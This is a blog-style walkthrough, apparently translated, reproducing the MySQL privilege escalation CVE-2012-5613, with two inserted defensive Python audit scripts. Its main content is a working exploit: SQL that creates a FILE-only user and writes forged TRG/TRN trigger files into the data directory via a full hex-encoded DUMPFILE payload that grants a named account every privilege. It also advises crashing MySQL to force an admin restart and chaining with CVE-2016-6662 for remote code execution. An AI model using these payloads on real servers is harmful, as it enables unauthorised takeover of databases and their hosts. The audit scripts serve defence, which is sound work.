CVE-2012-5613: MySQL local privilege escalation

Source: Internet
Author: User
Tags: file permissions, cve

CVE-2012-5613 is a vulnerability in which a user holding the FILE privilege writes a forged trigger definition into the TRG files that MySQL uses to store triggers; when root later fires the trigger, the body runs with root's privileges and the user is escalated. I do not know why this hole has never been fixed; MySQL probably regards it as a feature.

Preparation

Test environment:

Server version: 5.5.48-log Source distribution

Create a trigger in the test database:

CREATE TABLE foo (a INT, b INT, ts TIMESTAMP);
CREATE TABLE bar (a INT, b INT);
INSERT INTO foo (a, b) VALUES (1,1);
INSERT INTO foo (a, b) VALUES (2,2);
INSERT INTO foo (a, b) VALUES (3,3);

DELIMITER //
CREATE TRIGGER ins_sum AFTER UPDATE ON foo
FOR EACH ROW
BEGIN
  IF NEW.ts <> OLD.ts THEN
    INSERT INTO bar (a, b) VALUES (NEW.a, NEW.b);
  END IF;
END;
//
DELIMITER ;

Once the trigger has been created, two files appear in the database directory (/usr/local/mysql/var/test/): foo.TRG and ins_sum.TRN, both owned by the mysql user.

Change to a simpler trigger:

DROP TRIGGER IF EXISTS ins_sum;

DELIMITER //
CREATE TRIGGER ins_sum AFTER UPDATE ON foo
FOR EACH ROW
BEGIN
  UPDATE user SET sex=3 WHERE id=1;
END;
//
DELIMITER ;

The TRG file now contains:

TYPE=TRIGGERS
triggers='CREATE DEFINER=`root`@`%` TRIGGER ins_sum AFTER UPDATE ON foo\nFOR EACH ROW\nBEGIN\nUPDATE user SET sex=3 WHERE id=1;\nEND'
sql_modes=0
definers='root@%'
client_cs_names='utf8mb4'
connection_cl_names='utf8mb4_general_ci'
db_cl_names='utf8mb4_general_ci'
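Because the TRG file is a plain key=value text file, a defender can audit what is on disk independently of what the running server reports. The following script is an added example, not code from the original post: it parses a TRG file in the layout shown above, recovers each trigger's name, definer and body, and flags two things: a trigger that exists on disk but is not among the names the server currently knows (the window this post describes, where a file has been dropped in and is waiting for a restart), and a trigger whose body edits privilege data. The sample file content is constructed; the set of known trigger names would in practice come from `SELECT TRIGGER_NAME FROM information_schema.TRIGGERS WHERE TRIGGER_SCHEMA='test'`. The escape set handled by `unescape` is an assumption about MySQL's TRG writer (backslash before n, backslash, quote, 0 and Z).

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample of a .TRG file in the layout the post shows: one
# 'triggers=' line per trigger, with matching 'definers=' and charset
# lines. Newlines inside a trigger body are stored as the two characters
# backslash + n, and single quotes as backslash + quote.
SAMPLE_TRG = (
    "TYPE=TRIGGERS\n"
    "triggers='CREATE DEFINER=`root`@`%` TRIGGER ins_sum AFTER UPDATE ON foo\\n"
    "FOR EACH ROW\\nBEGIN\\n  INSERT INTO bar (a, b) VALUES (NEW.a, NEW.b);\\nEND'\n"
    "triggers='CREATE DEFINER=`root`@`%` TRIGGER ins_priv AFTER UPDATE ON foo\\n"
    "FOR EACH ROW\\nBEGIN\\n  UPDATE mysql.user SET Super_priv=\\'Y\\' WHERE User=\\'demo\\';\\nEND'\n"
    "sql_modes=0\nsql_modes=0\n"
    "definers='root@%'\ndefiners='root@%'\n"
    "client_cs_names='utf8mb4'\nclient_cs_names='utf8mb4'\n"
    "connection_cl_names='utf8mb4_general_ci'\nconnection_cl_names='utf8mb4_general_ci'\n"
    "db_cl_names='utf8mb4_general_ci'\ndb_cl_names='utf8mb4_general_ci'\n"
)

# Escape sequences used inside quoted .TRG values (assumption: the set the
# MySQL TRG writer emits; an unknown sequence is kept literally).
_ESCAPES = {"n": "\n", "\\": "\\", "'": "'", "0": "\0", "Z": "\x1a"}


def unescape(value: str) -> str:
    """Undo the backslash escaping applied to a quoted .TRG value."""
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            out.append(_ESCAPES.get(value[i + 1], "\\" + value[i + 1]))
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def parse_trg(text: str) -> List[Dict[str, str]]:
    """Return one {'name', 'definer', 'body'} dict per trigger in a .TRG file."""
    fields: Dict[str, List[str]] = {}
    for line in text.splitlines():
        key, sep, raw = line.partition("=")   # split at the first '=' only
        if not sep:
            continue
        if key == "TYPE":
            if raw != "TRIGGERS":
                raise ValueError(f"not a trigger file: TYPE={raw}")
            continue
        if len(raw) >= 2 and raw[0] == "'" and raw[-1] == "'":
            raw = raw[1:-1]
        fields.setdefault(key, []).append(unescape(raw))
    definers = fields.get("definers", [])
    triggers = []
    for i, body in enumerate(fields.get("triggers", [])):
        # The i-th 'triggers=' line pairs with the i-th 'definers=' line.
        m = re.search(r"\bTRIGGER\s+`?(\w+)`?\s", body, re.IGNORECASE)
        triggers.append({
            "name": m.group(1) if m else "<unparsed>",
            "definer": definers[i] if i < len(definers) else "",
            "body": body,
        })
    return triggers


# Body patterns that have no place in an application trigger: direct edits
# of the grant tables, GRANT statements, or *_priv columns.
_PRIV_TOUCH = re.compile(r"\bmysql\s*\.\s*user\b|\bGRANT\b|\w+_priv\b", re.IGNORECASE)


def audit_trg(text: str, known_names: Set[str]) -> List[Tuple[str, str]]:
    """Flag triggers on disk that the server does not report, and triggers
    whose body modifies privilege data. Returns (trigger name, finding)."""
    findings = []
    for trg in parse_trg(text):
        if trg["name"] not in known_names:
            findings.append((trg["name"], "present on disk but not in information_schema.TRIGGERS"))
        if _PRIV_TOUCH.search(trg["body"]):
            findings.append((trg["name"], f"definer {trg['definer']} modifies privilege data"))
    return findings


if __name__ == "__main__":
    # Server reports only ins_sum; the file also carries ins_priv.
    for name, msg in audit_trg(SAMPLE_TRG, {"ins_sum"}):
        print(f"{name}: {msg}")
```

Run it against every `*.TRG` under the data directory and feed it the trigger names the server returns; any trigger it lists under "not in information_schema.TRIGGERS" was written to disk by something other than a CREATE TRIGGER on the running server and deserves a look before the next restart.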

Start of the test:

Create an ordinary user that has only the FILE privilege plus SELECT on the test database:

CREATE USER 'sec_usr123'@'%' IDENTIFIED BY 'sec_usr123';
GRANT FILE ON *.* TO 'sec_usr123'@'%';
GRANT SELECT ON test.* TO 'sec_usr123'@'%';
FLUSH PRIVILEGES;

As root, first create a trigger that tries to promote the ordinary user to superuser directly with GRANT; this attempt fails, because GRANT is not permitted inside a trigger body:

DROP TRIGGER IF EXISTS ins_sum;

DELIMITER //
CREATE TRIGGER ins_sum AFTER UPDATE ON foo
FOR EACH ROW
BEGIN
  GRANT ALL PRIVILEGES ON *.* TO 'sec_usr1234foo'@'%' WITH GRANT OPTION;
END;
//
DELIMITER ;

Rewrite it the way the exploit-db PoC does (https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/23077.pl):

DROP TRIGGER IF EXISTS ins_sum;

DELIMITER //
CREATE TRIGGER ins_sum AFTER UPDATE ON foo
FOR EACH ROW
BEGIN
  UPDATE mysql.user SET Select_priv='Y', Insert_priv='Y', Update_priv='Y', Delete_priv='Y',
    Create_priv='Y', Drop_priv='Y', Reload_priv='Y', Shutdown_priv='Y', Process_priv='Y',
    File_priv='Y', Grant_priv='Y', References_priv='Y', Index_priv='Y', Alter_priv='Y',
    Show_db_priv='Y', Super_priv='Y', Create_tmp_table_priv='Y', Lock_tables_priv='Y',
    Execute_priv='Y', Repl_slave_priv='Y', Repl_client_priv='Y', Create_view_priv='Y',
    Show_view_priv='Y', Create_routine_priv='Y', Alter_routine_priv='Y', Create_user_priv='Y',
    ssl_type='Y', ssl_cipher='Y', x509_issuer='Y', x509_subject='Y',
    max_questions='Y', max_updates='Y', max_connections='Y'
  WHERE User='sec_usr1234foo';
END;
//
DELIMITER ;

Success.

Now, as the ordinary user, try writing into the trigger directory using the FILE privilege:

SELECT '1111' INTO OUTFILE '/usr/local/mysql/var/test/1.txt';

The write succeeded.

Writing the file with OUTFILE (note that OUTFILE refuses to write a file that already exists):

The ordinary user (sec_usr123) now uses the FILE privilege to create the TRG file:

SELECT 'TYPE=TRIGGERS\ntriggers=\'CREATE DEFINER=\'root\'@\'%\' TRIGGER ins_sum AFTER UPDATE ON foo\n\\n FOR EACH ROW\n\\n BEGIN\n\\n\n\\n UPDATE user SET sex=3 WHERE id=1;\n\\n\n\\n END\'\nsql_modes=0\ndefiners=\'root@%\'\nclient_cs_names=\'utf8mb4\'\nconnection_cl_names=\'utf8mb4_general_ci\'\ndb_cl_names=\'utf8mb4_general_ci\''
INTO OUTFILE '/usr/local/mysql/var/test/foo.TRG' FIELDS ESCAPED BY '';

SELECT 'TYPE=TRIGGERNAME\ntrigger_table=foo' INTO OUTFILE '/usr/local/mysql/var/test/ins_sum.TRN' FIELDS ESCAPED BY '';

Restart MySQL

sudo /etc/init.d/mysql restart

After several attempts it turned out that extra backslashes were being written into the file, so MySQL failed to load the trigger on restart.

Switch to writing the file content as a hex literal; note that DUMPFILE rather than OUTFILE must be used, because DUMPFILE writes the value byte for byte, with no escaping and no trailing newline:

 select 545950453d54524947474552530a74726967676572733d2743524541544520444546494e45523d60726f6f746040602560205452494747455220696e7 35f73756d20414654455220555044415445204f4e20666f6f0d5c6e20202020464f52204541434820524f570d5c6e20202020424547494e0d5c6e2020 20202020202055504441544520206d7973716c2e757365722020534554202053656c6563745f707269763d5c27595c272c2020496e736572745f70726 9763d5c27595c272c20205570646174655f707269763d5c27595c272c202044656c6574655f707269763d5c27595c272c20204372656174655f707269 763d5c27595c272c202044726f705f707269763d5c27595c272c202052656c6f61645f707269763d5c27595c272c202053687574646f776e5f7072697 63d5c27595c272c202050726f636573735f707269763d5c27595c272c202046696c655f707269763d5c27595c272c20204772616e745f707269763d5c 27595c272c20205265666572656e6365735f707269763d5c27595c272c2020496e6465785f707269763d5c27595c272c2020416c7465725f707269763 D5c27595c272c202053686f775f64625f707269763d5c27595c272c202053757065725f707269763d5c27595c272c20204372656174655f746d705f74 61626c655f707269763D5c27595c272c20204c6f636b5f7461626c65735f707269763d5c27595c272c2020457865637574655f707269763d5c27595c272c20205265706c5f73 6c6176655f707269763d5c27595c272c20205265706c5f636c69656e745f707269763d5c27595c272c20204372656174655f766965775f707269763d5 c27595c272c202053686f775f766965775f707269763d5c27595c272c20204372656174655f726f7574696e655f707269763d5c27595c272c2020416c 7465725f726f7574696e655f707269763d5c27595c272c20204372656174655f757365725f707269763d5c27595c272c202073736c5f747970653d5c2 7595c272c202073736c5f6369706865723d5c27595c272c2020783530395f6973737565723d5c27595c272c2020783530395f7375626a6563743d5c27 595c272c6d61785f7175657374696f6e733d5c27595c272c20206d61785f757064617465733d5c27595c272c20206d61785f636f6e6e656374696f6e7 33d5c27595c27202057484552452020557365723d5c277365635f75737231323334666f6f5c273b200d5c6e20202020454e44270a73716c5f6d6f6465 733d300a646566696e6572733d27726f6f744025270a636c69656e745f63735f6e616d65733d27757466386d6234270a636f6e6e656374696f6e5f636 
c5f6e616d65733d27757466386d62345f67656e6572616c5f6369270a64625f636c5f6e616d65733d27757466386d62345f67656e6572616c5f6369270a INTO DUMPFILE '/usr/local/mysql/var/test/foo.TRG';

SELECT 0x545950453d545249474745524e414d450a747269676765725f7461626c653d666f6f0a INTO DUMPFILE '/usr/local/mysql/var/test/ins_sum.TRN';

Restart MySQL; the root user then runs an UPDATE, which fires the trigger:

SELECT * FROM mysql.user WHERE User='sec_usr1234foo';
UPDATE foo SET a=9 WHERE b=1;
SELECT * FROM mysql.user WHERE User='sec_usr1234foo';

Summary of CVE-2012-5613:

Prerequisites:

1. An ordinary user with the FILE privilege and a SELECT privilege.

2. The administrator must restart MySQL once, after which some statement must fire the trigger (an INSERT, UPDATE or DELETE on the table).
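The first prerequisite is the one a defender can check and remove. The function below is an added example (not code from the original post) that evaluates a snapshot of the relevant mysql.user columns together with the server's `secure_file_priv` setting and data directory: an account with File_priv='Y' that is not already a superuser is reported only when INTO OUTFILE/DUMPFILE is actually able to reach the data directory, i.e. when `secure_file_priv` is empty or names a directory that contains it. The user rows are constructed; in practice they come from `SELECT User, Host, File_priv, Super_priv FROM mysql.user` and the two settings from `SHOW VARIABLES`. Treating a NULL `secure_file_priv` as "file I/O disabled" follows the behaviour of newer server versions and is an assumption for a 5.5 server.

```python
import os
from typing import List, Optional, Sequence, Tuple

# Constructed snapshot of (User, Host, File_priv, Super_priv) from mysql.user.
SAMPLE_USERS = [
    ("root", "localhost", "Y", "Y"),
    ("sec_usr123", "%", "Y", "N"),      # the kind of account the post creates
    ("app", "10.0.0.%", "N", "N"),
]


def file_priv_exposure(users: Sequence[Tuple[str, str, str, str]],
                       secure_file_priv: Optional[str],
                       datadir: str) -> List[Tuple[str, str, str]]:
    """Return (user, host, reason) for non-superuser accounts whose FILE
    privilege lets them write into the server's data directory."""
    datadir = os.path.normpath(datadir)          # 'dir/' and 'dir' compare equal
    if secure_file_priv is None:
        # NULL (assumption: newer-server semantics): server-side file I/O is off.
        return []
    if secure_file_priv == "":
        reason = ("secure_file_priv is empty: INTO OUTFILE/DUMPFILE may write "
                  "anywhere mysqld can, including the data directory")
    else:
        sfp = os.path.normpath(secure_file_priv)
        if sfp != datadir and not datadir.startswith(sfp + os.sep):
            return []                            # restricted to a directory outside datadir
        reason = f"secure_file_priv ({sfp}) contains the data directory"
    return [(user, host, reason)
            for user, host, file_priv, super_priv in users
            if file_priv == "Y" and super_priv != "Y"]   # superusers gain nothing


if __name__ == "__main__":
    for user, host, reason in file_priv_exposure(SAMPLE_USERS, "", "/usr/local/mysql/var"):
        print(f"'{user}'@'{host}': {reason}")
```

The two remediations that follow from a finding are `REVOKE FILE ON *.* FROM 'sec_usr123'@'%';` for accounts that do not need it, and setting `secure_file_priv` in my.cnf to a dedicated directory outside the data directory for those that do.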

Attack scenario:

Ideally, reproduce the target's environment elsewhere, generate the TRG and TRN files there and hex-encode them, then write them into the target's MySQL data directory with DUMPFILE. The restart can come from making MySQL unavailable: when MySQL is down the administrator will naturally restart it. How to get the administrator to fire the trigger is a matter of improvisation.

At this point sec_usr1234foo holds superuser privileges and can run SET GLOBAL general_log ..., which, combined with CVE-2016-6662 from the previous article (http://www.cnblogs.com/xiaoxiaoleo/p/5873091.html), gives the much-discussed "ordinary user to remote RCE" result.

